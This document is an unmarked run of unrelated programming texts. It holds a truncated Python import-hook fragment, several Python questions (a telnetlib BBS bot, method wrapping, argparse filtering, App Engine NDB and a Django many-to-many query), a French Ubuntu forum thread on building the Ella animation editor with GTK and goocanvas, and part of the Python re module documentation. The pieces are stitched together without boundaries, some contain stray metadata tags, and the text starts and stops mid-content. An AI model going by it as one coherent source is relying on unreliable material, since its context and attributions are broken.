os.path.join(os.path.join(os.path.dirname(__file__), 'thirdparty'), module+'.py') if not os.path.isfile(path): return None raise ImportError("Could not find dummy class for %s (%s)\n(searched:%s)" % (module, fullname, path)) self._importTuples[fullname] = path, ('.py', 'r', imp.PY_SOURCE) return self def load_module(self, fullname): fp = None python = False print fullname if self._importTuples[fullname][1][2] in (imp.PY_SOURCE, imp.PY_COMPILED, imp.PY_FROZEN): fp = open( self._importTuples[fullname][0], self._importTuples[fullname][1][1]) python = True try: imp.load_module(fullname, fp, *self._importTuples[fullname]) finally: if python: module = fullname.rpartition('.')[2] #setattr(sys.modules[fullname], module, getattr(sys.modules[fullname], module)) #sys.modules[fullname] = getattr(sys.modules[fullname], module) if isinstance(fp, file): fp.close() return getattr(sys.modules[fullname], module) sys.path_hooks.append(Importer)
I tried to connect bbs with python's library "telnetlib", try to make a robot to answer the message. While I answered the message,the robot return more than 1 message.These are my code. # -*- coding: cp950 -*- import telnetlib,random #f= open("ans.txt","r") ans = [b"oao", b"xd"] '''while True: line = f.readline() if line = "": break ans.append(line) ''' tn = telnetlib.Telnet("ptt.cc") tn.read_very_eager() tn.write(b"*****\r\n") # this is where i enter my username tn.read_very_eager() tn.write(b"*****\r\n") # this is wher i enter my password tn.read_very_eager() tn.write(b"\r\n") while True: if tn.read_very_eager() != "" : tn.write(b"") tn.read_very_eager() tn.write(b"su\r\n") tn.read_very_eager() tn.write(b"\r\n") tn.read_very_eager() tn.write(b"\r\n\r\n←") tn.read_very_eager() tn.read_very_eager() for i in range(0,1000000): x = 1
I have code in which all objects descend from a base object, which I don't plan to instantiate directly. In the __init__() method of my base object I'm trying to perform some magic -- I am trying to decorate, or wrap, every method of the object being initialized. But I'm getting a result that puzzles me when I call the resulting methods. Here is example code that isolates the problem: class ParentObject(object): def __init__(self): self._adjust_methods(self.__class__) def _adjust_methods(self, cls): for attr, val in cls.__dict__.iteritems(): if callable(val) and not attr.startswith("_"): setattr(cls, attr, self._smile_warmly(val)) bases = cls.__bases__ for base in bases: if base.__name__ != 'object': self._adjust_methods(base) def _smile_warmly(self, the_method): def _wrapped(cls, *args, **kwargs): print "\n-smile_warmly - " +cls.__name__ the_method(self, *args, **kwargs) cmethod_wrapped = classmethod(_wrapped) return cmethod_wrapped class SonObject(ParentObject): def hello_son(self): print "hello son" def get_sister(self): sis = DaughterObject() print type(sis) return sis class DaughterObject(ParentObject): def hello_daughter(self): print "hello daughter" def get_brother(self): bro = SonObject() print type(bro) return bro if __name__ == '__main__': son = SonObject() son.hello_son() daughter = DaughterObject() daughter.hello_daughter() sis = son.get_sister() print type(sis) sis.hello_daughter() bro = sis.get_brother() print type(bro) bro.hello_son() The program crashes, however -- the line sis = son.get_sister() results in the sis object having a type of NoneType. Here is the output: -smile_warmly - SonObject hello son -smile_warmly - DaughterObject hello daughter -smile_warmly - SonObject <class '__main__.DaughterObject'> <type 'NoneType'> Traceback (most recent call last): File "metaclass_decoration_test.py", line 48, in <module> sis.hello_daughter() AttributeError: 'NoneType' object has no attribute 'hello_daughter' Why is this happening?
Tony95 Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux Salut à tous je savais pas trop où poster donc je le fais ici. J'ai un petit soucis en GTK, j'aimerais créer une interface permettant de charger et sauvegarder des fichiers mais j'arrive vraiment pas à m'en sortir pour le code. En gros j'ai une fenetre qui me sert de menu avec 4 boutons dont deux servant respectivement à charger et à sauvegarder des fichiers. J'ai du mal à connecter chaque bouton à la fonction qui va avec (c'est mon premier soucis). Ce que je veux dire c'est qu'après avoir cliqué sur le bouton "sauvegarder" j'aimerais avoir l'affichage de la fenêtre de chargement des fichiers. Et la même chose pour sauvegarder aussi. J'ai juste trouvé une fonction pour renvoyer le chemin du fichier sélectionné mais elle est un peu inutile. Je tien sà préciser que je suis nul en GTK et que j'ai juste des notions de base. Merci d'avance pour votre aide. Hors ligne philarmonie Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux @ kevlar: c'est surtout les abscisses dont tu as besoin pour la position des events, non? et la police a un impact dessus? Pour ce qui est de la technique de surcharge, là ça rentre dans du C donc je ne comprends pas tout, mais on doit pouvoir faire sans. Normalement quelque soient les containers dans lesquels se trouve ton widget, ça n'a pas d'impact sur la façon de gérer les events. Pour le motion-notify-event en python je peux le capter sans problème #!/usr/bin/pyhton import gtk class Win: def __init__(self): self.win = gtk.Window() self.ruler = gtk.HRuler() self.ruler.set_size_request(200, 20) self.ruler.set_range(0, 200, 10, 200) # rajoute la gestion du clic pour le ruler self.ruler.add_events(gtk.gdk.BUTTON_PRESS_MASK) self.win.connect("delete-event", gtk.main_quit) self.win.add(self.ruler) self.ruler.connect('button-press-event', self.press) self.ruler.connect('motion-notify-event', self.move) self.win.show_all() def press(self, widget, event): print 'pressed on', event.get_coords() def move(self, widget, event): print 'move on', event.get_coords() if __name__ == '__main__': win = Win() gtk.main() Edit: ce n'est pas la peine de rajouter cet event, il est déjà capté par le ruler (et a déjà un callback dessus) il faut juste rajouter un callback dessus. @ Tony95: ouvre ton propre sujet et précise dans quel langage tu codes. Dernière modification par philarmonie (Le 08/06/2009, à 20:12) kevlar Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux merci Philarmonie. En fait, je me débrouille en utilisant la dernière version(message #25), et maintenant, le déplacement de la règle est coordonné avec celui de la timeline, de l'indicateur de position dans l'animation, et cela sans utiliser les GTkRulers. Reste à terminer de répondre au défi en trouvant un moyen d'installer un "balayage" de la position courante, comme sur Macromedia Flash Pro, mais à mon avis ça peut se résoudre avec une gestion "habile" des icônes ... Ella : projet de logiciel d'animation Flash pour Linux http://forum.ubuntu-fr.org/viewtopic.php?id=321017&p=1 Projet Ella sur launchpad : https://launchpad.net/ella Le retour d'Ella animations avec le projet Renaissance est ici : https://launchpad.net/ella-renaissance et des fichiers de démo ici : http://ellarenaissance.voila.net/index.html Hors ligne kevlar Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux eh bien, la solution aux limites de Gtk est un projet complémentaire, goocanvas ; il permet enfin une gestion "moderne" des éléments graphiques, permettant entre autres de faire répondre des morceaux de dessins à des clics souris, etc .. . Ella : projet de logiciel d'animation Flash pour Linux http://forum.ubuntu-fr.org/viewtopic.php?id=321017&p=1 Projet Ella sur launchpad : https://launchpad.net/ella Le retour d'Ella animations avec le projet Renaissance est ici : https://launchpad.net/ella-renaissance et des fichiers de démo ici : http://ellarenaissance.voila.net/index.html Hors ligne philarmonie Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux eh bien, la solution aux limites de Gtk est un projet complémentaire, goocanvas; il permet enfin une gestion "moderne" des éléments graphiques,permettant entre autres de faire répondre des morceaux de dessins à des clics souris, etc.. . Bah on peut le faire en gtk sans goocanvas. J'ai fait une logiciel de création de thème usplash, j'ai une DrawingArea dans laquelle je dessine le thème avec son arrière plan, sa barre et sa zone de texte, et elle réagit très bien aux actions de la souris. Il me manque juste le redimensionnement des objets avec la souris mais c'est pas un problème de gestion des événements, mais plutôt d'apprendre à dessiner des rectangles transparents avec cairo. kevlar Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux intéressant, tu peux mettre une copie d'écran ? (moi je ne peux pas, ImageShack ne répond pas en ce moment ...) Dernière modification par kevlar (Le 15/06/2009, à 17:31) Ella : projet de logiciel d'animation Flash pour Linux http://forum.ubuntu-fr.org/viewtopic.php?id=321017&p=1 Projet Ella sur launchpad : https://launchpad.net/ella Le retour d'Ella animations avec le projet Renaissance est ici : https://launchpad.net/ella-renaissance et des fichiers de démo ici : http://ellarenaissance.voila.net/index.html Hors ligne kevlar Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux Voici une copie : la règle ne provient pas de Gtk : elle est gérée par goocanvas. Elle est composée d'éléments graphiques standards (lignes, texte) qui peuvent chacun émettre des événements. Ainsi, un clic sur une des graduations, ou sur le numéro de l'image, renvoit à un traitement à callback. A titre de comparaison, la dernière version "pure Gtk" est ci-dessous : Il est facile de voir qu'il me fallait TROIS lignes de widgets pour faire la même règle (capable, bien entendu, de réagir aux clics, il ne s'agissait déjà plus d'un GtkRuler). De plus, avec goocanvas, l'espace est mieux géré, je peux contrôler le rendu de la règle (car goocanvas s'appuie sur cairo ) Dernière modification par kevlar (Le 15/06/2009, à 17:42) Ella : projet de logiciel d'animation Flash pour Linux http://forum.ubuntu-fr.org/viewtopic.php?id=321017&p=1 Projet Ella sur launchpad : https://launchpad.net/ella Le retour d'Ella animations avec le projet Renaissance est ici : https://launchpad.net/ella-renaissance et des fichiers de démo ici : http://ellarenaissance.voila.net/index.html Hors ligne philarmonie Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux L'image est composée de 3 éléments chacun dans un pixbuf: le fond, la barre et la zone de texte. Je peux déplacer la barre et la zone de texte avec la souris, comme on peut le faire avec n'importe quel icône sur le bureau par exemple. Si je fais un clic-droit sur la barre elle fait une rotation, Shif+clic gauche c'est un centrage verticale, shif+clic gauche c'est un centrage horizontale. Dernière modification par philarmonie (Le 15/06/2009, à 17:46) kevlar Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux L'image est composée de 3 éléments chacun dans un pixbuf: le fond, la barre et la zone de texte. Je peux déplacer la barre et la zone de texte avec la souris, comme on peut le faire avec n'importe quel icône sur le bureau par exemple. Si je fais un clic-droit sur la barre elle fait une rotation, Shif+clic gauche c'est un centrage verticale, shif+clic gauche c'est un centrage horizontale. D'abord, une remarque : superbe ! Ensuite : pour déplacer les éléments visuels, tu dois faire un drag'n' drop ? Sache que sous goocanvas, il est très facile de faire des "poignées" autour d'un objet ; pour peu que ces "poignées" soient le dernier élément ajouté, il se comporte comme un sprite, et n'efface pas le contexte en arrière-plan. Cela devrait donc répondre à ta préoccupation. Voici comment je procède pour afficher/ effacer la position sur la timeline (petit triangle gris sur la règle) :afficher à la position image "position" en tenant compte de la taille des graduations : /************************************/ /* afficher le curseur de la règle */ /**********************************/ void affiche_curseur_regle(GooCanvasItem *root, gint position) { pRulerCursorItem = goo_canvas_image_new(root, GDK_PIXBUF(pIcoRulerCursor), position*RULER_WIDTH+(RULER_WIDTH/2)-6, RULER_HEIGHT-12,NULL); } effacer le curseur sans abîmer l'arrière-plan (une seule ligne de code ...) : /**********************************/ /* effacer le curseur de la règle */ /**********************************/ void efface_curseur_regle(void) { goo_canvas_item_remove(pRulerCursorItem); } Ella : projet de logiciel d'animation Flash pour Linux http://forum.ubuntu-fr.org/viewtopic.php?id=321017&p=1 Projet Ella sur launchpad : https://launchpad.net/ella Le retour d'Ella animations avec le projet Renaissance est ici : https://launchpad.net/ella-renaissance et des fichiers de démo ici : http://ellarenaissance.voila.net/index.html Hors ligne philarmonie Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux D'abord, une remarque : superbe ! Merci, c'est le thème que j'ai au démarrage de mon pc Ensuite : pour déplacer les éléments visuels, tu dois faire un drag'n' drop ? Sache que sous goocanvas, il est très facile de faire des "poignées" autour d'un objet ; pour peu que ces "poignées" soient le dernier élément ajouté, il se comporte comme un sprite, et n'efface pas le contexte en arrière-plan. Cela devrait donc répondre à ta préoccupation. Oui c'est du drag'n drop. Qu'entends tu par sprite et n'efface pas le contexte en arrière plan? Tu veux dire que si je déplace la barre par exemple, la partie du background qui occupe l'ancienne position redevient visible? Ce comportement j'ai effectivement du en écrire le code. Voici comment je procède pour afficher/ effacer la position sur la timeline (petit triangle gris sur la règle) : afficher à la position image "position" en tenant compte de la taille des graduations :<metadata lang=R prob=0.14 /> /************************************/ /* afficher le curseur de la règle */ /**********************************/ void affiche_curseur_regle(GooCanvasItem *root, gint position) { pRulerCursorItem = goo_canvas_image_new(root, GDK_PIXBUF(pIcoRulerCursor), position*RULER_WIDTH+(RULER_WIDTH/2)-6, RULER_HEIGHT-12,NULL); } effacer le curseur sans abîmer l'arrière-plan (une seule ligne de code ...) :<metadata lang=CSS prob=0.12 /> /**********************************/ /* effacer le curseur de la règle */ /**********************************/ void efface_curseur_regle(void) { goo_canvas_item_remove(pRulerCursorItem); } Effectivement ça demande pas beaucoup de ligne de code, c'est pratique. Comme je code en python, faut que je regarde si goocanvas a été porté en python. Dernière modification par philarmonie (Le 15/06/2009, à 18:11) kevlar Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux > oui, un sprite est un objet, initialement destiné aux jeux videos, dont le comportement s'apparente à ton pointeur de souris : déplacement propre, se met en superposition en respectant le fond pour peu que le GdkPixbuf source ait des parties transparentes. > tu as de la chance : porté en Python, et en plus, Google te renverra une foultitude d'exemples en python, et quasiment rien en C > en fait, goocanvas contient l'essentiel pour faire un éditeur vectoriel, un peu ce que fais ton programme ... Ella : projet de logiciel d'animation Flash pour Linux http://forum.ubuntu-fr.org/viewtopic.php?id=321017&p=1 Projet Ella sur launchpad : https://launchpad.net/ella Le retour d'Ella animations avec le projet Renaissance est ici : https://launchpad.net/ella-renaissance et des fichiers de démo ici : http://ellarenaissance.voila.net/index.html Hors ligne kevlar Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux voici la nouvelle version : au menu, utilisation, comme dit précédemment, de la bibliothèque goocanvas, et, nouveauté, du modèle GtkListStore, GtkTreeView : - la partie "calques" à gauche est une GtkTreeView, parfaitement fonctionnelle (édition, duplication ...) - la partie de droite(règle, time line) est construite à partir de goocanvas. Dernière modification par kevlar (Le 18/06/2009, à 17:27) Ella : projet de logiciel d'animation Flash pour Linux http://forum.ubuntu-fr.org/viewtopic.php?id=321017&p=1 Projet Ella sur launchpad : https://launchpad.net/ella Le retour d'Ella animations avec le projet Renaissance est ici : https://launchpad.net/ella-renaissance et des fichiers de démo ici : http://ellarenaissance.voila.net/index.html Hors ligne kevlar Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux le code est très simple : 1- créer une fonction génératrice pour le menu déroulant : void timeline_popup_menu_(GdkEventButton *event) { GtkWidget *menu, *item; menu = gtk_menu_new (); // this opens the downloader window, or brings it to the foreground if already open item = gtk_menu_item_new_with_mnemonic (("_Créer une image-clé")); g_signal_connect_swapped (item, "activate",G_CALLBACK (cb_new_keyframe), NULL); gtk_menu_shell_append (GTK_MENU_SHELL (menu), item); item = gtk_menu_item_new_with_mnemonic (("_Supprimer l'image-clé")); g_signal_connect_swapped (item, "activate",G_CALLBACK (cb_remove_keyframe), NULL); gtk_menu_shell_append (GTK_MENU_SHELL (menu), item); gtk_widget_show_all (menu); gtk_menu_popup (GTK_MENU (menu), NULL, NULL, NULL, NULL,/* pointeur datas */ event->button, /* bouton de la souris, automatique */ event->time); /* moment du clic, automatique */ } 2- brancher cette fonction dans la callback répondant aux clics-souris : /**************************** * réponse aux clics-souris * sur la timeline * *************************/ static gboolean on_timeline_button_press(GooCanvasItem *item, GooCanvasItem *target, GdkEventButton *event, GtkWidget *win) { /* clic-gauche ou clic-droit ? */ if (event->button==3) /* clic droit */ { timeline_popup_menu_(event); } Dernière modification par kevlar (Le 20/06/2009, à 17:30) Ella : projet de logiciel d'animation Flash pour Linux http://forum.ubuntu-fr.org/viewtopic.php?id=321017&p=1 Projet Ella sur launchpad : https://launchpad.net/ella Le retour d'Ella animations avec le projet Renaissance est ici : https://launchpad.net/ella-renaissance et des fichiers de démo ici : http://ellarenaissance.voila.net/index.html Hors ligne kevlar Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux Ella : projet de logiciel d'animation Flash pour Linux http://forum.ubuntu-fr.org/viewtopic.php?id=321017&p=1 Projet Ella sur launchpad : https://launchpad.net/ella Le retour d'Ella animations avec le projet Renaissance est ici : https://launchpad.net/ella-renaissance et des fichiers de démo ici : http://ellarenaissance.voila.net/index.html Hors ligne kevlar Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux aujourd'hui : gestion des sélections à la souris sur la time line (partie en vert de cette copie = zone sélectionnée). Les contrôles sont faits : impossible de sélectionner une zone ne contenant pas d'images, par exemple. en fait, gérer une sélection est très simple, après branchement des événements "motion_notify", et "button-release" sur les éléments du goocanvas. Reste une limite (si quelqu'un passe avec une idée ... ) : comment, lors de la sélection d'une zone, assurer en même temps le scrolling de la fenêtre dans laquelle se déplace la souris ? Faut-il réutiliser l'événement "motion_notify", et, lorsque le pointeur est à l'une des limites, provoquer le scrolling ? A voir ! Dernière modification par kevlar (Le 22/06/2009, à 14:56) Ella : projet de logiciel d'animation Flash pour Linux http://forum.ubuntu-fr.org/viewtopic.php?id=321017&p=1 Projet Ella sur launchpad : https://launchpad.net/ella Le retour d'Ella animations avec le projet Renaissance est ici : https://launchpad.net/ella-renaissance et des fichiers de démo ici : http://ellarenaissance.voila.net/index.html Hors ligne kevlar Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux après une période de sommeil, voici le travail du jour : la mise en place d'une barre d'outils, destinée à l'hypothétique éditeur vectoriel qui sera (peut-être) un jour associé au programme ... Cette barre est construite avec les méthodes postérieures à Gtk 2.4 (voire même 2.12) ; elle est remplie d'icônes qui sont des gtk_radio_tool_button ; les fonctions de "markup" sont mises à profit pour enrichir le texte du titre de la barre d'outils, et les tooltips sont actifs, comme vous le voyez sur la copie. Le choix de boutons radio permet de n'avoir, automatiquement, qu'un seul outil activé à la fois, géré avec une callback réagissant à à l'événement toggled Dernière modification par kevlar (Le 02/07/2009, à 20:43) Ella : projet de logiciel d'animation Flash pour Linux http://forum.ubuntu-fr.org/viewtopic.php?id=321017&p=1 Projet Ella sur launchpad : https://launchpad.net/ella Le retour d'Ella animations avec le projet Renaissance est ici : https://launchpad.net/ella-renaissance et des fichiers de démo ici : http://ellarenaissance.voila.net/index.html Hors ligne kevlar Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux Ella : projet de logiciel d'animation Flash pour Linux http://forum.ubuntu-fr.org/viewtopic.php?id=321017&p=1 Projet Ella sur launchpad : https://launchpad.net/ella Le retour d'Ella animations avec le projet Renaissance est ici : https://launchpad.net/ella-renaissance et des fichiers de démo ici : http://ellarenaissance.voila.net/index.html Hors ligne kevlar Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux Et maintenant, la dernière étape facile ! Intégrer la barre d'outils dans une fenêtre contenant elle-même un GtkNotebook, qui portera, lui, , d'une part, l'éditeur vectoriel (le gros, gros morceau ), et, d'autre part, le lecteur flash, servant à la prévisualisation (beaucoup plus facile, grâce aux bibliothèques swfdec : L'éditeur vectoriel va utiliser au maximum la bibliothèque goocanvas, parfaitement adaptée à cet usage Dernière modification par kevlar (Le 03/07/2009, à 14:32) Ella : projet de logiciel d'animation Flash pour Linux http://forum.ubuntu-fr.org/viewtopic.php?id=321017&p=1 Projet Ella sur launchpad : https://launchpad.net/ella Le retour d'Ella animations avec le projet Renaissance est ici : https://launchpad.net/ella-renaissance et des fichiers de démo ici : http://ellarenaissance.voila.net/index.html Hors ligne haile_selassie Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux Hop, sujet en marque-pages, ça m'intéresse Beau boulot, continue à donner des nouvelles! Hors ligne kevlar Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux oui, tu devines l'objectif final, mais c'est encore loin, loin ... Ella : projet de logiciel d'animation Flash pour Linux http://forum.ubuntu-fr.org/viewtopic.php?id=321017&p=1 Projet Ella sur launchpad : https://launchpad.net/ella Le retour d'Ella animations avec le projet Renaissance est ici : https://launchpad.net/ella-renaissance et des fichiers de démo ici : http://ellarenaissance.voila.net/index.html Hors ligne haile_selassie Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux oui, tu devines l'objectif final, mais c'est encore loin, loin ... Certainement. Mais perso, quand je programme, ce que j'aime, c'est apprendre de nouveaux trucs. Après, finir les objectifs que tu t'es fixés, c'est sur que c'est super plaisant aussi ^^ Tu es tout seul à le programmer ? non pas que je veuille t'aider, je ne connais pas GTK, mais ça parait quand meme ambitieux pour le réaliser seul, non? Hors ligne kevlar Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux oui, tout seul, c'est effectivement fait sur le mode "loisirs", donc pas de contraintes ...:lol: Ella : projet de logiciel d'animation Flash pour Linux http://forum.ubuntu-fr.org/viewtopic.php?id=321017&p=1 Projet Ella sur launchpad : https://launchpad.net/ella Le retour d'Ella animations avec le projet Renaissance est ici : https://launchpad.net/ella-renaissance et des fichiers de démo ici : http://ellarenaissance.voila.net/index.html Hors ligne kevlar Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux ce matin, début de mise en place réelle de l'éditeur vectoriel : tracé de lignes simples : les autres figures ne posent pas plus de problèmes ; ce qu'il faut, maintenant, c'est gérer en interne une base de données référençant tous les goocanvasitem (s) utilisés par l'éditeur vectoriel, et, d'autre part, associer les groupes de dessins au bon calque ... Ella : projet de logiciel d'animation Flash pour Linux http://forum.ubuntu-fr.org/viewtopic.php?id=321017&p=1 Projet Ella sur launchpad : https://launchpad.net/ella Le retour d'Ella animations avec le projet Renaissance est ici : https://launchpad.net/ella-renaissance et des fichiers de démo ici : http://ellarenaissance.voila.net/index.html Hors ligne kevlar Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux aujourd'hui : - éditeur vectoriel complété avec les fonctions de tracés de boîtes (box) et de cercles (ellipses) - amélioration de la barre d'outils : j'ai ajouté la possibilité de choisir le style de ligne (icône en forme d'engrenage) et le style de texte (icône avec deux "A") ; les icônes de réglage sont regroupées dans la palette dans une rubrique "styles" - pour le projet lui-même, je pense que je vais associer à chacun des calques de la timeline( voir post #40) un élément très pratique de la bibliothèque goocanvas : les "groupes d'objets" ; l'astuce est de n'avoir qu'un seul canvas, dans lequel chaque calque forme un groupe, et chaque calque pourra pointer sur d'autres groupes d'objets ; ainsi, effacer un calque effacera tous les objets qu'il contient, sans toucher au reste du canvas. Ella : projet de logiciel d'animation Flash pour Linux http://forum.ubuntu-fr.org/viewtopic.php?id=321017&p=1 Projet Ella sur launchpad : https://launchpad.net/ella Le retour d'Ella animations avec le projet Renaissance est ici : https://launchpad.net/ella-renaissance et des fichiers de démo ici : http://ellarenaissance.voila.net/index.html Hors ligne kevlar Re : Ella : projet de logiciel d'animation Flash & SVG pour Linux bon, aujourd'hui, grosse rigolade (:(:(:() : tenter de modifier le style de trait en utilisant goocanvas ; pas le moindre exemple sur le net, documentation ultra limitée ; enfin, en croisant avec la documentation de cairo, et quelques erreurs de segmentation après, voici un code tout simple qui permet de préparer la mise en place de la sélection des objets par l'éditeur vectoriel ; voici le code du rectangle de sélection utilisant goocanvas: /********************************** * rectangle de sélection en cours * *******************************/ void selection_box(GooCanvasItem *ancetre, gdouble x1t,gdouble y1t,gdouble x2t,gdouble y2t) { gdouble t; static const double dashed1[] = {4.0, 4.0}; static int len1 = sizeof(dashed1) / sizeof(dashed1[0]); GooCanvasLineDash *style_trait; style_trait=goo_canvas_line_dash_newv(len1,(gdouble *)dashed1); SelectedArea=TRUE; /* vérifier les valeurs des coins */ if (x2t<x1t) { t=x1t; x1t=x2t; x2t=t; } if (y2t<y1t) { t=y1t; y1t=y2t; y2t=t; } pDrawings=goo_canvas_rect_new(ancetre, x1t+10,y1t+10, x2t-x1t,y2t-y1t, "line-width", 2.0, "radius-x", 1.0, "radius-y", 1.0, "stroke-color", "blue", "line-dash", style_trait, NULL); } Dernière modification par kevlar (Le 07/07/2009, à 16:30) Ella : projet de logiciel d'animation Flash pour Linux http://forum.ubuntu-fr.org/viewtopic.php?id=321017&p=1 Projet Ella sur launchpad : https://launchpad.net/ella Le retour d'Ella animations avec le projet Renaissance est ici : https://launchpad.net/ella-renaissance et des fichiers de démo ici : http://ellarenaissance.voila.net/index.html Hors ligne
I wrote several modules to operate a system for different stuff. Only need the IP address of the system. Now, is it possile to define a class to inherit all functions already developed in other python modules? Thanks, I'm not sure if this is exactly what you're looking for, but you can import other_module class MyClass(other_module.OtherClass): def my_function(self): #do something that calls a function that belonged to OtherClass self.other_function()
My context is a very simple filter-like program that streams lines from an input file into an output file, filtering out lines the user (well, me) doesn't want. The filter is rather easy, simply requiring a particular value for some 'column' in the input file. Options are easily expressed with argparse: parser.add_argument('-e', '--example', type=int, metavar='EXAMPLE', help='require a value of %(metavar)s for column "example"') There's a few of these, all typed. As the actual filter gets a line at some point, the question whether to include such a line is simple: split the line and check all the required filters: c1, c2, c3, *_ = line.split('\t') c1, c2, c3 = int(c1), int(c2), int(c3) # ← this line bugs me if args.c1 and args.c1 != c1: return False The second line of which bugs me a bit: as the values are initially strings and I need them to be something else, the types need to be changed. Although short, I'm not entirely convinced this is the best solution. Some other options: create a separate function to hide the thing that bugs me; remove the type=declarations from the options (also removes automatic user input validation); coerce the arguments back to strs and do the comparison withstrs (would lead to about the same as what I've got). Which of the options available would be the 'best', 'most pythonic', 'prettiest'? Or am I just overthinking this...
Sorry if this question is too simple; I'm only entering 9th grade. I'm trying to learn about NoSQL database design. I want to design a Google Datastore model that minimizes the number of read/writes. Here is a toy example for a blog post and comments in a one-to-many relationship. Which is more efficient - storing all of the comments in a StructuredProperty or using a KeyProperty in the Comment model? Again, the objective is to minimize the number of read/writes to the datastore. You may make the following assumptions: Comments will not be retrieved independently of their respective blog post. (I suspect that this makes the StructuredProperty most preferable.) Comments will need to be sortable by date, rating, author, etc. (Subproperties in the datastore cannot be indexed, so perhaps this could affect performance?) Both blog posts and comments may be edited (or even deleted) after they are created. Using StructuredProperty: from google.appengine.ext import ndb class Comment(ndb.Model): various properties... class BlogPost(ndb.Model): comments = ndb.StructuredProperty(Comment, repeated=True) various other properties... Using KeyProperty: from google.appengine.ext import ndb class BlogPost(ndb.Model): various properties... class Comment(ndb.Model): blogPost = ndb.KeyProperty(kind=BlogPost) various other properties... Feel free to bring up any other considerations that relate to efficiently representing a one-to-many relationship with regards to minimizing the number of read/writes to the datastore. Thanks.
I have some models like that; class Ingredient(models.Model): name = models.CharField(max_length=128) class Recipe(models.Model): name = models.CharField(max_length=128) ingredients = models.ManyToManyField(Ingredient, through='RecipeIngredient') class RecipeIngredient(models.Model): recipe = models.ForeignKey(Recipe) ingredient = models.ForeignKey(Ingredient) How can I find the recipes that contains all Ingredients? Here is an example; >>> i1 = Ingredient(name="egg") >>> i1.save() >>> i2 = Ingredient(name="flour") >>> i2.save() >>> i3 = Ingredient(name="water") >>> i3.save() >>> i4 = Ingredient(name="milk") >>> i4.save() >>> i5 = Ingredient(name="sugar") >>> i5.save() >>> i6 = Ingredient(name="carrot") >>> i6.save() >>> i7 = Ingredient(name="wheat") >>> i7.save() >>> r1 = Recipe(name="omelet") >>> r1.save() >>> r1.ingredients.add(i1, i2, i3) >>> r2 = Recipe(name="icecream") >>> r2.save() >>> r2.ingredients.add(i3, i4, i5) >>> test = Recipe.objects.filter(ingredients__in=[i1.id, i2.id, i3.id, i4.id]) >>> test [<Recipe: omelet>, <Recipe: omelet>, <Recipe: omelet>, <Recipe: icecream>, <Recipe: icecream>] I want to find only omelet. Because only omelet contains egg (i1), flour (i2), water (i3) Thanks
Module re Support for regular expressions (RE). This module provides regular expression matching operations similar to those found in Perl. It supports both 8-bit and Unicode strings; both the pattern and the strings being processed can contain null bytes and characters outside the US ASCII range. Regular expressions can contain both special and ordinary characters. Most ordinary characters, like "A", "a", or "0", are the simplest regular expressions; they simply match themselves. You can concatenate ordinary characters, so last matches the string 'last'. The special characters are: "." Matches any character except a newline. "^" Matches the start of the string. "$" Matches the end of the string. "*" Matches 0 or more (greedy) repetitions of the preceding RE. Greedy means that it will match as many repetitions as possible. "+" Matches 1 or more (greedy) repetitions of the preceding RE. "?" Matches 0 or 1 (greedy) of the preceding RE. *?,+?,?? Non-greedy versions of the previous three special characters. {m,n} Matches from m to n repetitions of the preceding RE. {m,n}? Non-greedy version of the above. "\\" Either escapes special characters or signals a special sequence. [] Indicates a set of characters. A "^" as the first character indicates a complementing set. "|" A|B, creates an RE that will match either A or B. (...) Matches the RE inside the parentheses. The contents can be retrieved or matched later in the string. (?iLmsux) Set the I, L, M, S, U, or X flag for the RE (see below). (?:...) Non-grouping version of regular parentheses. (?P<name>...) The substring matched by the group is accessible by name. (?P=name) Matches the text matched earlier by the group named name. (?#...) A comment; ignored. (?=...) Matches if ... matches next, but doesn't consume the string. (?!...) Matches if ... doesn't match next. The special sequences consist of "\\" and a character from the list below. If the ordinary character is not on the list, then the resulting RE will match the second character. \number Matches the contents of the group of the same number. \A Matches only at the start of the string. \Z Matches only at the end of the string. \b Matches the empty string, but only at the start or end of a word. \B Matches the empty string, but not at the start or end of a word. \d Matches any decimal digit; equivalent to the set [0-9]. \D Matches any non-digit character; equivalent to the set [^0-9]. \s Matches any whitespace character; equivalent to [ \t\n\r\f\v]. \S Matches any non-whitespace character; equiv. to [^ \t\n\r\f\v]. \w Matches any alphanumeric character; equivalent to [a-zA-Z0-9_]. With LOCALE, it will match the set [0-9_] plus characters defined as letters for the current locale. \W Matches the complement of \w. \\ Matches a literal backslash. This module exports the following functions: match Match a regular expression pattern to the beginning of a string. search Search a string for the presence of a pattern. sub Substitute occurrences of a pattern found in a string. subn Same as sub, but also return the number of substitutions made. split Split a string by the occurrences of a pattern. findall Find all occurrences of a pattern in a string. compile Compile a pattern into a RegexObject. purge Clear the regular expression cache. escape Backslash all non-alphanumerics in a string. Some of the functions in this module takes flags as optional parameters: I IGNORECASE Perform case-insensitive matching. L LOCALE Make \w, \W, \b, \B, dependent on the current locale. M MULTILINE "^" matches the beginning of lines as well as the string. "$" matches the end of lines as well as the string. S DOTALL "." matches any character at all, including the newline. X VERBOSE Ignore whitespace and comments for nicer looking RE's. U UNICODE Make \w, \W, \b, \B, dependent on the Unicode locale. This module also defines an exception 'error'. match(pattern, string, flags=0) Try to apply the pattern at the start of the string, returning a match object, or None if no match was found. search(pattern, string, flags=0) Scan through string looking for a match to the pattern, returning a match object, or None if no match was found. sub(pattern, repl, string, count=0) Return the string obtained by replacing the leftmost non-overlapping occurrences of the pattern in string by the replacement repl. subn(pattern, repl, string, count=0) Return a 2-tuple containing 